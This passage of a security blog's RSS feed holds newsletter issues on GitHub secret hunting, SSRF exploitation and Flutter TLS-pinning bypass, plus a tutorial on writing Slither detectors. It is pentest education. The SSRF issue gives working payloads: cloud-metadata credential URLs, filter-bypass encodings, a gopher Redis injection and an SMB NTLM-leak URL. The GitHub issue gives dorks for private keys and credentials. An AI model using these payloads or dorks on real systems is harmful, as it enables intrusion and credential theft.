Docker. “Docker Bench for Security.” Available at: [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security)</content:encoded><author>Ruben Santos</author></item><item><title>🐙 Hacking GitHub – A Beginner’s Guide to Finding the (Not So) Hidden Stuff</title><link>https://www.kayssel.com/newsletter/issue-5</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-5</guid><description>Learn how exposed .git folders, sloppy commits, and forgotten tokens can turn a dev&apos;s mistake into your recon goldmine.</description><pubDate>Sun, 18 May 2025 07:44:20 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re all doing well and still not accidentally committing your .env files 😅

Before we dive in, just a quick note: I&apos;m currently working on the next post for the blog! It&apos;s going to be all about hacking in Docker while building a security tool in Rust. A mix of learning, building, and breaking things, so stay tuned. I hope you&apos;ll enjoy it! 🚀

This week, we&apos;re diving into GitHub but not just as a place where devs hang out and push code. We’re treating it like a public treasure map for recon, and you&apos;re about to learn how to read it.  
If you&apos;re new to security or bug hunting, this is a great place to start. Let&apos;s go 👇

# 🧩 So… What Is Git? And Why Do Hackers Care?

At its core, Git is a version control system. It tracks changes in files over time so developers can:

-   Work together without stepping on each other’s toes,
-   Roll back when things break (which they do),
-   And keep a complete history of everything.

Git stores data in a structure of commits, where each one is like a snapshot of the project at that moment. These snapshots live in a hidden `.git` directory and include all file contents, history, metadata, and links to parent commits.

Now, GitHub is just a platform built on top of Git. It hosts your Git repositories online and adds features like:

-   Web-based collaboration,
-   Pull requests and issues,
-   Actions for automation (CI/CD),
-   And, occasionally… juicy developer mistakes.

Why does this matter for us?  
Because all of that metadata, history, and collaboration?  
It can leak things. Big things.

# 🔍 GitHub Dorking (The Google Hacking of GitHub)

GitHub’s search engine is surprisingly powerful. You can use advanced queries (a.k.a. dorks) to find files that **probably shouldn&apos;t be public**.

&lt;details&gt;
&lt;summary&gt;Some juicy examples:&lt;/summary&gt;

```bash
filename:.env
filename:id_rsa
filename:credentials AWS
extension:pem private

```
&lt;/details&gt;


🔧 Tools to help automate this:

-   [`github-dorks`](https://github.com/techgaun/github-dorks)
-   [`github-search`](https://github.com/gwen001/github-search)

Try them. It’s wild what you’ll find just sitting out there.

# 💾 Fuzzing for `.git/` – Downloading Repos in Production

One of the **most overlooked but real-world exploitable issues** is when developers leave the `.git/` folder exposed in production servers.

&lt;details&gt;
&lt;summary&gt;If you fuzz URLs and find something like:&lt;/summary&gt;

```bash
https://example.com/.git/
```
&lt;/details&gt;


...congrats. You can often **dump the entire source code** using [`git-dumper`](https://github.com/arthaud/git-dumper):

```bash
git-dumper https://example.com/.git/ ./dumped-repo

```

This fetches:

-   The full history,
-   Commit logs,
-   Deleted secrets (yep),
-   And sometimes hardcoded credentials to staging or prod.

Pair this with tools like `ffuf` or `dirsearch` to **fuzz for the `.git/` path**, and you&apos;ve got a reliable technique to add to your recon routine.

# 🧠 Dig Through the Commit History

Even if a developer deletes a secret, Git keeps it in the commit history.

&lt;details&gt;
&lt;summary&gt;Try this:&lt;/summary&gt;

```bash
git log -p | grep -i &quot;password\|secret\|token&quot;

```
&lt;/details&gt;


Or use scanners that do it for you:

-   [`TruffleHog`](https://github.com/trufflesecurity/trufflehog)
-   [`Gitleaks`](https://github.com/gitleaks/gitleaks)

These tools can even scan Git **blobs, packfiles, and old deleted commits**.

# 💣 Recover Deleted Files

Git is like a clingy ex—it doesn’t let go of anything.

&lt;details&gt;
&lt;summary&gt;You can find deleted files using:&lt;/summary&gt;

```bash
git log --diff-filter=D --summary

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;And for hidden or unreachable stuff:&lt;/summary&gt;

```bash
git fsck --unreachable --dangling

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Then extract with:&lt;/summary&gt;

```bash
git cat-file -p &lt;blob-hash&gt;

```
&lt;/details&gt;


I&apos;ve found `.env` files, API keys, and even production DB creds sitting quietly in those forgotten corners.

# ⚙️ GitHub Actions – Your CI/CD Playground

Many repos use GitHub Actions to automate builds and deployments. But misconfigured workflows = goldmine for attackers.

&lt;details&gt;
&lt;summary&gt;Look inside:&lt;/summary&gt;

```bash
.github/workflows/*.yml

```
&lt;/details&gt;


Red flags to look for:

-   `pull_request_target` events (can be abused from forks),
-   Secrets used without proper validation,
-   Dynamic `run:` commands pulling in untrusted input.

It&apos;s a CI/CD Wild West out there.

# 🧪 Submodules &amp; Internal Clues

Some projects use Git submodules, which can reveal internal tools or private repos.

&lt;details&gt;
&lt;summary&gt;Check this:&lt;/summary&gt;

```bash
cat .gitmodules

```
&lt;/details&gt;


Other files that leak info:

-   `.npmrc`, `.pypirc`, `.dockerignore`
-   `.vscode/settings.json`
-   `.github/ISSUE_TEMPLATE/config.yml`

You’ll often find references to internal servers, S3 buckets, test credentials, and even real domains.

# 📦 Analyzing `.pack` Files and Blobs

Feeling adventurous?

Git compresses unused data into `.pack` files. You can extract them using:

```bash
git unpack-objects &lt; .git/objects/pack/pack-xyz.pack

```

&lt;details&gt;
&lt;summary&gt;And then:&lt;/summary&gt;

```bash
git cat-file -p &lt;hash&gt;

```
&lt;/details&gt;


Sometimes scanners miss stuff in compressed blobs. Doing this manually = more finds and more fun.

# 🧪 Where to Practice GitHub Hacking

Want to get your hands dirty? Here are a few solid places to start:

**Labs &amp; CTFs:**

-   🧪 **TryHackMe – Git Happens**  
    Great intro to `.git` folder exposures, how to use `git-dumper`, and what sensitive info might be lurking in commit histories.
-   🎮 [**Git-Game**](https://github.com/git-game/git-game)  
    A terminal-based challenge where you solve puzzles using Git commands. It’s super fun and teaches you to explore branches, tags, logs, and hidden secrets.
-   🧠 **Hack The Box – Devzat**  
    Find an exposed `.git` folder (no 404s to help you), use `git-dumper`, and dig through commit history to uncover credentials.
-   🔍 **Hack The Box – Editorial**  
    Commit spelunking at its finest. Find a leaked password, then exploit a vulnerable `python-git` dependency for remote code execution.
-   🛠 **Hack The Box – Craft**  
    Combines Git repo analysis with leaked JWTs and Git issues. Use tools like TruffleHog or go full manual. Realistic and very satisfying.
-   💾 **Hack The Box – Pilgrimage**  
    Classic `.git` leak. Dump the repo, analyze the code, and use what you find to break in deeper.
-   ⚙️ **Hack The Box – Bitlab**  
    GitLab-based box with JavaScript-leaked creds, Git hooks for privesc, and a full repo-to-root flow.
-   🐙 **Hack The Box – OpenSource**  
    Gitea box where you’ll explore commit history for keys, exploit GitSync automation, and craft a sneaky pre-commit privesc.

**Tools:**

-   `git-dumper`
-   `truffleHog`
-   `gitleaks`
-   `github-search`
-   `ffuf` + `.git` wordlists

**Dork collections:**

-   [techgaun/github-dorks](https://github.com/techgaun/github-dorks)

### 🧭 Final Thoughts

GitHub isn&apos;t just a platform for devs. It&apos;s a hacker’s playground full of leftover tokens, config files, and developer breadcrumbs.

If you’re just getting started:

-   Learn Git internals. Understanding `.git` gives you power.
-   Practice with fuzzing + `git-dumper`.
-   Explore commits and deleted files regularly.

Git doesn’t forget. Use that to your advantage.

Catch you next week,

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Inside the Request: From Basic SSRF to Internal Takeover</title><link>https://www.kayssel.com/newsletter/issue-4</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-4</guid><description>A practical guide to finding and exploiting SSRF vulnerabilities in modern applications.</description><pubDate>Sun, 11 May 2025 08:03:38 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing well!

Last week, I shared some techniques for hacking Flutter apps diving into client-side vulnerabilities and reverse engineering tips.

This week, we’re jumping into SSRF (Server-Side Request Forgery) one of those vulnerabilities that looks basic, but can lead to internal access, cloud credentials theft, and even remote code execution in certain setups.

Let’s break it down 👇

## 💥 What is SSRF?

**Server-Side Request Forgery (SSRF)** happens when an application lets you make the server send HTTP requests _on your behalf_. You control the destination of the request, which allows you to:

-   Access internal-only services (`127.0.0.1`, private IPs)
-   Read cloud metadata (AWS, GCP, etc.)
-   Reach internal dashboards, databases, or APIs
-   Trigger internal network scans or data exfiltration
-   Detect external callbacks (Blind SSRF)

Below we’ll look at some of the most common exploitation techniques.

## 🔍 How to Spot Potential SSRF

Before sending payloads, here’s how to recognize a potential SSRF point:

✅ Is there a **URL parameter**?  
✅ Does the app **fetch content based on user input**?  
✅ Does it provide features like:

-   PDF or screenshot generation from external URLs
-   Link previews
-   HTML to PDF/invoice rendering
-   Importing resources from external domains
-   Microservices communication via URLs

If yes, there&apos;s a good chance SSRF might be in play.

&lt;details&gt;
&lt;summary&gt;Try basic probes like:&lt;/summary&gt;

```bash
http://127.0.0.1
http://169.254.169.254/
http://your-id.interact.sh
```
&lt;/details&gt;


## ⚔️ Common SSRF Techniques

### Basic SSRF

&lt;details&gt;
&lt;summary&gt;You control a URL parameter that the server fetches:&lt;/summary&gt;

```bash
url=http://127.0.0.1:8080/admin
```
&lt;/details&gt;


This may expose internal interfaces not meant for external users.

### Cloud Metadata Access ☁️

&lt;details&gt;
&lt;summary&gt;Cloud environments like AWS and GCP expose sensitive metadata at:&lt;/summary&gt;

```bash
http://169.254.169.254/latest/meta-data/
```
&lt;/details&gt;


If reachable, you can steal IAM credentials.

### Open Redirect Bypass 🔁

If a whitelist blocks direct access but follows redirects, try:

```bash
https://trusted.com/redirect?to=http://127.0.0.1:8000
```

The app accepts the trusted domain and unknowingly redirects internally.

### Blind SSRF 👻

You may not see any response but the request still goes through.  
Use tools like:

-   [interact.sh](https://github.com/projectdiscovery/interactsh)
-   Burp Collaborator

These help detect outbound DNS/HTTP requests triggered by SSRF.

### SSRF in PDF Converters

A classic SSRF target. PDF generators often fetch external resources like images or fonts. You can inject:

```bash
&lt;img src=&quot;http://169.254.169.254/latest/meta-data/&quot; /&gt;
```

If the service embeds the content in the resulting PDF, you’ve got sensitive data in hand.

Also applies to:

-   Invoice generation tools
-   Email previews
-   Screenshot renderers

## 🚀 Bonus: Advanced SSRF Techniques

If you&apos;re already familiar with the basics of SSRF, here are 3 powerful techniques that show up in real-world bug bounty reports and internal pentests. These help bypass common defenses and escalate access beyond basic HTTP abuse.

### **URL Obfuscation (Bypass Filters with Tricks)**

Many applications block obvious inputs like `127.0.0.1` or `localhost`, but forget to account for alternative encodings or formats.

🧪 Try these:

```bash
http://127.1
http://2130706433 (decimal for 127.0.0.1)
http://[::ffff:127.0.0.1] (IPv6-style)
http://127.0.0.1@yourdomain.com (spoofed hostname)
```

These tricks are surprisingly effective for **bypassing simple regex-based filters** or insecure allowlists.

### **SSRF via Headers (Referer / User-Agent Abuse)**

Not all SSRFs live in URL parameters. Some services (like link previewers or analytics engines) make internal requests based on headers.

📌 Trick:

```bash
Referer: http://your-interact-url.com
User-Agent: http://169.254.169.254/latest/meta-data/
```

If the backend system automatically fetches content from these headers (e.g. for scraping or logging), you can trigger **blind SSRF** even if no URL parameter is exposed.

### **SSRF via Gopher, Redis, or SMB**

Some SSRFs allow non-HTTP schemes like `gopher://`, `smb://`, or `redis://`. If so, things get really interesting.

-   **Gopher** lets you craft raw TCP payloads (great for Redis injection)
-   **Redis** access allows you to write files or escalate via misconfigurations
-   **SMB** can trigger NTLM authentication leaks from the server

📌 Example – Redis Injection via Gopher:

```bash
gopher://127.0.0.1:6379/_%2a1%0d%0aset%20hacked%20true%0d%0a
```

📌 Example – NTLM Hash Leak via SMB:

```bash
smb://your-smb-server.com/share
```

💡 These are high-impact payloads in internal networks, often leading to:

-   Remote file writes
-   Credential theft
-   Pivoting and lateral movement

## 🧪 Where to Practice SSRF

### Tryhackme SSRF module

To learn the basic theory you can use TryHackme:

-   [SSRF Module](https://tryhackme.com/room/ssrfhr)

### 📘 PortSwigger Web Security Academy

Free, realistic labs from beginner to advanced:

-   [Server-side request forgery](https://portswigger.net/web-security/ssrf)

### 🧠 Hack The Box – SSRF Machines

Here are some great boxes that feature SSRF:

-   [Editorial](https://www.hackthebox.com/machines/editorial) (easy) → Classic SSRF exploitation for port enumeration.
-   [Gofer](https://www.hackthebox.com/machines/gofer) (hard) → Using the gopher scheme to get access

## 🧰 Tools for SSRF Discovery

-   `ffuf`, `paramspider`, `ParamMiner` → Great for finding URL-based parameters
-   `SSRFmap` → Automates SSRF payloads and internal probing
-   `dnslog.cn`, `interact.sh` → For blind SSRF detection
-   Burp Suite + Collaborator Everywhere
-   Nuclei → Fuzz for SSRF with DAST templates:

```bash
cat urls-with-params.txt | nuclei -dast
```

## 🧭 Final Thoughts

SSRF is simple in concept but powerful in impact, especially when it gives you access to internal services or cloud credentials.

It shows up often in the wild, and with tools like `Nuclei`, `Burp`, and `SSRFmap`, you can hunt it efficiently.

Keep your eyes open for URL-based parameters, especially in converters, previews, and importers.

Catch you next week,

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Breaking Flutter: A Pentester’s Guide to Dart, Snapshots, and TLS Bypasses</title><link>https://www.kayssel.com/newsletter/issue-3</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-3</guid><description>Real-world techniques and tools for reversing Flutter apps, bypassing TLS pinning, and understanding how Dart code gets shipped in production.</description><pubDate>Sun, 04 May 2025 09:11:41 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing great.

Last week, I shared some key Kerberos attack techniques for pentesters.  
This time, we’re switching gears to something more mobile: **Flutter**, and specifically, how to break it.

Lately, I’ve been auditing several Flutter apps and wanted to share some tips I’ve discovered during the process.  
Whether you’re analyzing a Flutter app during a mobile engagement or just curious about how Flutter works under the hood, this post will give you practical techniques to reverse and poke at them like a pro.

Let’s jump in.

## Quick Theory: How Flutter Apps Actually Work

Before diving into recon techniques, it’s important to understand what makes Flutter apps different under the hood and why reversing them isn&apos;t as straightforward as with regular Android apps.

#### Flutter uses Dart and AOT Compilation

Flutter apps are written in Dart. When building for release (production), Dart code is compiled ahead of time (AOT) into native code. On Android, this results in a native shared object called `libapp.so`, which contains the app’s business logic. This means:

-   There’s no `.dex` or `.smali` representation of the Dart code.
-   Tools like `jadx` won’t show the actual business logic.
-   You&apos;ll need to analyze native libraries directly or inspect Dart snapshots in non-release builds.

#### The Flutter Engine is Embedded

Every Flutter app bundles the Flutter engine, which lives in a shared object called `libflutter.so`. This handles rendering, input, animation, and communication between Dart and native code.

-   `libflutter.so` is shared across all Flutter apps.
-   It doesn&apos;t include project-specific logic, but it&apos;s useful when hooking native functionality with Frida.

#### Communication Happens via Platform Channels

Flutter uses platform channels (e.g., `MethodChannel`, `EventChannel`) to communicate between Dart and the native Android or iOS layer. These channels are critical when you want to hook authentication, storage, or cryptographic operations, as Dart often delegates those to native code.

#### Snapshots in Debug and Profile Builds

In `debug` or `profile` builds, `libapp.so` might not be present. Instead, the app runs using Dart snapshot files that are interpreted at runtime:

-   `kernel_blob.bin`
-   `isolate_snapshot_data`
-   `vm_snapshot_data`

These files can still expose class names, symbols, and logic structure. However, you’ll need specific tools or scripts to extract anything meaningful from them.

## Recon Techniques for Flutter Apps

Before jumping into traffic interception, it’s often a good idea to understand the app’s structure, logic, and surface area. Flutter apps complicate this due to their native compilation, but there are still effective techniques you can use to break them open.

#### Full APK Decompilation with apkx

[`apkx`](https://github.com/rednaga/apkx) automates the extraction of all APK internals, including DEX, resources, native libs, and converts the DEX to JAR for easy navigation. Great starting point to explore native libraries and any embedded Java/Kotlin logic.

```bash
apkx target.apk

```

#### Static Analysis with MobSF

[MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) gives you a fast overview of the app: permissions, activities, trackers, exposed components, and network endpoints. Even with Flutter, this helps uncover basic misconfigurations or embedded secrets.

#### Native Reversing with Ghidra

Flutter’s Dart code is usually compiled into `libapp.so`, which holds the AOT-compiled logic of the app. Tools like `jadx` won’t help much here. Instead, load the native library into Ghidra to reverse engineer low-level logic, look for method names, strings, and identify Flutter plugins or obfuscated behavior.

#### Dart Snapshot Inspection

Sometimes you’ll find files like `kernel_blob.bin`, `isolate_snapshot_data`, or `vm_snapshot_data` inside the APK. These contain compiled Dart bytecode. With custom tools or scripts, you can try to extract readable Dart symbols or identify class/function names.

#### Manual Recon with jadx

While most business logic is in Dart, many Flutter apps still include Java-based plugins (e.g. for network or crypto). `jadx` is useful for inspecting those native interfaces, especially when combined with Frida hooks later on.

## How to Intercept Traffic from Non-Proxy Aware Flutter Apps

So, you install the Flutter app you want to test, set up your proxy, route your device’s traffic through your Kali box... and nothing. No requests in Burp, no useful logs. What’s going on?

**The issue?**  
Flutter apps are often **non-proxy aware**, meaning they completely ignore your system proxy settings.

I plan to write a dedicated article on this soon, but here’s a quick overview of how to handle it:

#### Set up an OpenVPN server

This allows you to tunnel all traffic from the target device through a VPN that redirects requests to your Burp proxy.

#### Create a controlled Wi-Fi access point

Use a device like a Kali box or Raspberry Pi to host a rogue access point. Then configure `iptables` or `redir` to transparently forward traffic to your proxy.

Once you have traffic properly routed, you’ll most likely encounter **TLS pinning**. That’s where Frida becomes essential.

#### Use this Frida script to disable Flutter’s TLS verification

**NVISO’s Flutter TLS Bypass**  
GitHub: [https://github.com/NVISOsecurity/disable-flutter-tls-verification](https://github.com/NVISOsecurity/disable-flutter-tls-verification)

This script often works out of the box and patches the Flutter engine to disable certificate validation. However, in my experience, it tends to work more reliably on iOS than on Android. Your mileage may vary depending on the Flutter version and the target device.

#### Custom plugins may require extra work

Sometimes the app uses a plugin that handles its own TLS logic. In those cases, the generic Frida patch won’t be enough. Use tools like `jadx` to explore the code and locate certificate pinning implementations.

One plugin I’ve run into frequently is:  
[https://github.com/diefferson/http\_certificate\_pinning](https://github.com/diefferson/http_certificate_pinning)

To bypass it, you can try a Frida script like this one:  
[https://codeshare.frida.re/@incogbyte/android-mix-sslunpin-bypass/](https://codeshare.frida.re/@incogbyte/android-mix-sslunpin-bypass/)

**Important:** the class name used in the original repo is now `diefferson.http_certificate_pinning.HttpCertificatePinningPlugin`.  
Most public Frida bypasses still reference the old class name `HttpCertificatePinning`, so if the script fails, check for that.

#### Optional: Try ReFlutter for Dart snapshot extraction

You can also try [ReFlutter](https://github.com/ptswarm/reflutter) to extract and reconstruct Dart snapshot files like `isolate_snapshot_data` or `kernel_blob.bin`.  
It attempts to rebuild the original Dart code into a readable form.

That said, I haven’t had much luck getting useful output from it in practice, especially with recent versions of Flutter. Still, it’s worth trying in case you get lucky.

## Final Thoughts

That’s it for this post. Flutter may look different on the surface, but with the right tools and mindset, it becomes just another platform you can analyze and break effectively.

As I mentioned last week, the blog post for this week is focused on **Slither’s API**. It covers how to use it to create custom detectors and analyze smart contracts in depth.  
You can check it out here: [**Slither API Deep Dive**](https://www.kayssel.com/post/web3-18/)**.**

Let me know what you&apos;d like to see next, especially if you&apos;re into mobile or smart contract hacking.

# References

For setting up traffic interception with Burp and OpenVPN, check out this detailed guide:  
[Intercepting HTTP Traffic with OpenVPN on Android – InfoSec Writeups](https://infosecwriteups.com/intercepting-http-traffic-with-openvpn-on-android-5835fa40466d)

The OWASP Mobile Security Testing Guide also covers this technique here:  
[OWASP MASTG – MASTG-TECH-0109](https://mas.owasp.org/MASTG/techniques/android/MASTG-TECH-0109/)</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Beyond the CLI: Hacking Smart Contracts with the Slither API</title><link>https://www.kayssel.com/post/web3-18</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-18</guid><description>Discover the power of Slither&apos;s API for in-depth smart contract auditing. Learn how to build custom detectors, enhance output with Rich, and uncover hidden vulnerabilities beyond standard static analysis.</description><pubDate>Sun, 04 May 2025 08:52:40 GMT</pubDate><content:encoded># Introduction

In the previous chapter of this Web3 hacking series, I introduced one of the most widely used tools: **Slither**.  
Today, we&apos;re diving deeper by exploring its API. This API is extremely powerful and allows us to build custom tools to detect vulnerabilities in Ethereum smart contracts.

However, there’s one small catch: **the documentation isn’t great.** Especially when it comes to examples. Because of that, I had to spend some time not only reading the official docs but also digging into Slither’s GitHub repository to better understand how to use it.

With that said, let&apos;s dive into this little research project!

# Basic Recon

To interact with Slither&apos;s API more easily, we&apos;ll be using **IPython3**.  
Since the documentation is limited, IPython’s introspection capabilities make it much quicker to explore available functions and attributes on the fly.

Our first task will be to **enumerate the contracts** detected in a project.  
I’ll be using the [contracts we developed](https://www.kayssel.com/post/web3-17/) a few weeks ago for this demonstration.  
The syntax is pretty self-explanatory, so I’ll focus on commenting on the parts that I think will be most useful. 😄

Here&apos;s how to get started:

```python
from slither.slither import Slither

slither = Slither(&apos;.&apos;)  # Load Slither in the current directory

for contract in slither.contracts:
    print(contract.name)


```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
console
GrimoireOfEchoes
OracleOfWhispers

```
&lt;/details&gt;


Behind the scenes, Slither builds a full object model of your Solidity code.  
This is important to understand as we go forward, especially when building custom tools or detectors.

Here’s what you&apos;re working with under the hood:

-   `slither.contracts`: a list of all smart contracts found in the project. Each one is a `Contract` object.
-   `contract.functions`: all functions inside a contract including public, internal, and constructors.
-   `contract.state_variables`: lets you inspect the contract’s storage layout.
-   `function.nodes`: each function is broken down into control-flow blocks.
-   `node.irs`: every node contains IR (intermediate representation) instructions. This is where things like low-level calls, assignments, and expressions live.

As you explore the API, you&apos;ll be mostly traversing this structure jumping from contracts to functions, then diving into nodes and instructions when needed.

Let’s now try inspecting some of these pieces, starting with listing the functions of a specific contract.

## Exploring Functions and Variables

We can **list all the functions** in a specific contract like this:

```python
for contract in slither.contracts:
    if contract.name == &quot;GrimoireOfEchoes&quot;:
        for function in contract.functions:
            print(function.name)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
constructor
channelMana
notUsed
releaseEssence
amplifySpirits
invokeOracle

```
&lt;/details&gt;


Similarly, we can **enumerate state variables**:

```python
for contract in slither.contracts:
    if contract.name == &quot;GrimoireOfEchoes&quot;:
        for var in contract.state_variables:
            print(var.name)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
manaReservoir
corruptionIndex
forbiddenTithe
oracle

```
&lt;/details&gt;


## Finding Unused Variables

Using Slither’s API, we can check which variables are being **read** or **written** inside the contract:

```python
contract = slither.contracts[0]

for var in contract.state_variables:
    print(f&quot;Variable: {var.name}&quot;)
    readers = contract.get_functions_reading_from_variable(var)
    writers = contract.get_functions_writing_to_variable(var)
    print(f&quot;Writers: {len(writers)}&quot;)
    print(f&quot;Readers: {len(readers)}\n&quot;)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Variable: manaReservoir
Writers 3
Readers 3
Variable: corruptionIndex
Writers 1
Readers 1
Variable: forbiddenTithe
Writers 1
Readers 0
Variable: oracle
Writers 1
Readers 1

```
&lt;/details&gt;


This is super useful for spotting **unused variables**, which you can later report as informational findings.

## Checking Function Documentation

&lt;details&gt;
&lt;summary&gt;Another useful thing is to verify which functions are documented:&lt;/summary&gt;

```python
for function in contract.functions:
    print(f&quot;Function {function.name} is documented? {function.has_documentation}&quot;)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Function constructor is documented ? False
Function channelMana is documented ? False
Function notUsed is documented ? False
Function releaseEssence is documented ? True
Function amplifySpirits is documented ? False
Function invokeOracle is documented ? False

```
&lt;/details&gt;


Functions that lack proper documentation (especially **NatSpec**) can also be flagged as informational issue for clients.

## Listing Function Parameters

You might also want to inspect **function parameters**:

```python
for function in contract.functions:
    print(f&quot;Function {function.name}&quot;)
    if function.parameters:
        print(f&quot;Parameters: {&apos;, &apos;.join(str(p) for p in function.parameters)}\n&quot;)
    else:
        print(&quot;No parameters\n&quot;)

```

&lt;details&gt;
&lt;summary&gt;Output:&lt;/summary&gt;

```python
Function constructor
Parameters: _oracle

Function channelMana
No parameters

Function notUsed
No parameters

Function releaseEssence
No parameters

Function amplifySpirits
Parameters: spirits

Function invokeOracle
No parameters

```
&lt;/details&gt;


## Finding Dead Internal Functions

Here&apos;s a small script I built to find **internal or private functions** that are **never called**:

```python
def get_dead_internal_functions(slither, contract_names=None):
    dead_functions = set()

    for contract in slither.contracts:
        if contract_names and contract.name not in contract_names:
            continue

        internal_functions = {
            f.name for f in contract.functions if f.visibility in [&quot;internal&quot;, &quot;private&quot;]
        }
        used_internal_functions = set()

        for entry_point in contract.functions:
            if entry_point.visibility in [&quot;public&quot;, &quot;external&quot;]:
                for call in entry_point.all_internal_calls():
                    if hasattr(call, &quot;function&quot;) and hasattr(call.function, &quot;name&quot;):
                        used_internal_functions.add(call.function.name)

        dead_functions.update(internal_functions - used_internal_functions)

    return dead_functions


```

&lt;details&gt;
&lt;summary&gt;Usage:&lt;/summary&gt;

```python
slither = Slither(&apos;.&apos;)
get_dead_internal_functions(slither, &quot;GrimoireOfEchoes&quot;)

```
&lt;/details&gt;


## Improving Output with Rich

Raw output from Slither can be quite rough.  
Luckily, we can greatly improve it by using the Python library **Rich** to create clean tables:

```python
from rich.console import Console
from rich.table import Table

def list_contracts_and_files(slither):
    console = Console()
    table = Table(title=&quot;Contracts and Source Files&quot;, show_lines=True)
    table.add_column(&quot;Contract Name&quot;, style=&quot;bold cyan&quot;)
    table.add_column(&quot;File Path&quot;, style=&quot;magenta&quot;)

    for contract in slither.contracts:
        filename = str(contract.source_mapping.filename.short)
        table.add_row(contract.name, filename)

    console.print(table)

```

![](/content/images/2025/04/image-9.png)

Rich output

# Building a Custom Detector

Before jumping into the code, let’s take a moment to understand what a custom detector really is in Slither.

At its core, a detector is just a Python class that inspects the internal structure Slither builds when parsing your Solidity code. The cool part is that you don’t need to hack anything into Slither itself. The API gives you everything you need to analyze contracts, functions, variables, and even control flow.

Here’s what’s essential to know before writing one:

-   You’ll subclass `AbstractDetector`, the base class for all Slither detectors.
-   The core logic goes inside a method called `_detect()`, which Slither automatically runs.
-   From there, you’ll iterate over `slither.contracts`, access `contract.functions`, and dive into control flow or IR when needed.
-   To report an issue, you call `self.generate_result(...)` with the details you want to display.

So in short: you&apos;re just walking Slither’s internal object model, which we’ve already explored, and describing what to flag.

&lt;details&gt;
&lt;summary&gt;An example of a Custom Detector could be the next one:&lt;/summary&gt;

```python
from slither.detectors.abstract_detector import AbstractDetector, DetectorClassification
from slither.core.declarations import Function

class UnusedInternalFunctionDetector(AbstractDetector):
    ARGUMENT = &quot;unused-internal&quot;
    HELP = &quot;Detects internal/private functions that are never used&quot;
    IMPACT = DetectorClassification.LOW
    CONFIDENCE = DetectorClassification.HIGH

    WIKI = &quot;x&quot;

    WIKI_TITLE = &quot;Unused internal or private functions&quot;
    WIKI_DESCRIPTION = &quot;Detects internal or private functions that are never used by any public or external functions in the contract.&quot;
    WIKI_EXPLOIT_SCENARIO = (
        &quot;A contract has several internal functions written for reuse, &quot;
        &quot;but they are never actually called. This unnecessarily bloats the bytecode &quot;
        &quot;and may confuse future developers.&quot;
    )
    WIKI_RECOMMENDATION = (
        &quot;Remove unused internal or private functions to simplify the contract and reduce bytecode size.&quot;
    )

    def _detect(self):
        results = []

        for contract in self.slither.contracts:
            internal_funcs = {
                f.name: f
                for f in contract.functions
                if f.visibility in [&quot;internal&quot;, &quot;private&quot;]
            }

            used_funcs = {
                call.function.name
                for f in contract.functions
                if f.visibility in [&quot;public&quot;, &quot;external&quot;]
                for call in f.all_internal_calls()
                if hasattr(call, &quot;function&quot;) and hasattr(call.function, &quot;name&quot;)
            }

            for name, func in internal_funcs.items():
                if name not in used_funcs:
                    info = [f&quot;Unused internal function `{name}` in contract `{contract.name}`&quot;]
                    results.append(self.generate_result(info, func))

        return results

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;You can register and run the detector like this:&lt;/summary&gt;

```python
from detectors.custom_detector import UnusedInternalFunctionDetector
from slither.slither import Slither

slither = Slither(&apos;.&apos;)
slither.register_detector(UnusedInternalFunctionDetector)
slither.run_detectors()

```
&lt;/details&gt;


## Improving Slither CLI Output

If you want even cleaner output for all Slither’s built-in detectors, you can dynamically register all detectors and print findings in a table.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```python
import importlib
import inspect
from slither.slither import Slither
from slither.detectors import all_detectors
from slither.detectors.abstract_detector import AbstractDetector
from rich.console import Console
from rich.table import Table

console = Console()
slither = Slither(&quot;.&quot;)

for name in dir(all_detectors):
    obj = getattr(all_detectors, name)
    if inspect.isclass(obj) and issubclass(obj, AbstractDetector) and obj is not AbstractDetector:
        slither.register_detector(obj)

results = slither.run_detectors()

if results:
    table = Table(title=&quot;🔎 Slither Analysis Results&quot;, show_lines=True)
    table.add_column(&quot;Check&quot;, style=&quot;bold magenta&quot;)
    table.add_column(&quot;Impact&quot;, style=&quot;bold yellow&quot;)
    table.add_column(&quot;Confidence&quot;, style=&quot;green&quot;)
    table.add_column(&quot;Description&quot;, style=&quot;&quot;)

    for group in results:
        for issue in group:
            table.add_row(
                issue.get(&quot;check&quot;, &quot;N/A&quot;),
                issue.get(&quot;impact&quot;, &quot;N/A&quot;),
                issue.get(&quot;confidence&quot;, &quot;N/A&quot;),
                issue.get(&quot;description&quot;, &quot;No description&quot;)
            )
    console.print(table)
else:
    console.print(&quot;[bold green]✅ No issues found!&quot;)

        ```
```
&lt;/details&gt;


![](/content/images/2025/04/image-10.png)

Improving the default output of Slither

# Building a More Complex Detector: Gas Griefing

Gas griefing is a subtle but dangerous vulnerability pattern in Solidity smart contracts. It happens when a function performs a **low-level external call** (like `.call()`) and then updates the contract’s state **only if the call succeeds**.  
This can be exploited by an attacker who forces the external call to **fail repeatedly**, for example by consuming too much gas or triggering a revert. As a result, the state-changing logic never runs, potentially locking funds or disrupting the contract’s behavior.

Since this type of pattern isn’t detected by default in Slither, writing a custom detector is a great way to identify it across large codebases.

Here’s what this custom detector does:

-   It goes through all **public and external functions** in the codebase.
